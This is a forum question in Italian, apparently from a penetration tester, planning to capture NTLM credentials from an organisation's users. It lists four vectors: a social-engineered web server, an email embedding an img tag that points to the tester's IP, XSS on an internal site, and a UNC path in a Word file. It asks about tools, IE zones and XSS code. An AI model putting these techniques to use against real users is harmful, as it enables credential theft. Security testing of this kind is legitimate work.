Sto cercando di progettare un vettore di attacco contro un'organizzazione in cui il pen tester (me stesso), ruba credenziali NTLM tramite HTTP. Sto pensando a questi scenari:
1- Ho installato un server web sulla mia macchina e social-engineer gli utenti per visitarlo.
2- Invio di un'e-mail con <img src="my.ip.address/x.gif"/>
incorporato in modo che Outlook invii automaticamente le credenziali NTLM.
3- Utilizzo XSS su un sito Web locale per ottenere le credenziali NTLM.
4 percorso UNC al mio indirizzo IP in un file Word.
Vorrei ricevere assistenza e opinioni nei seguenti argomenti:
- Conosci qualche strumento che aiuti ad automatizzare alcune parti qui?
- Il collegamento agli utenti tramite l'indirizzo IP li costringerà effettivamente a utilizzare le proprie credenziali NTLM, non Kerberos?
- Posso tirare questo attacco su non-IE?
- Deve essere una zona sicura in IE? Il mio indirizzo IP (locale nel loro intervallo di rete, non esterno) sarà considerato una zona sicura / parte del dominio in IE?
- Come posso ottenerlo in XSS? Che tipo di codice XSS può aiutare qui?
- L'anteprima del documento Word di Outlook eseguirà correttamente il mio trucco UNC o dovrà scaricarlo ed eseguirlo?
Grazie mille.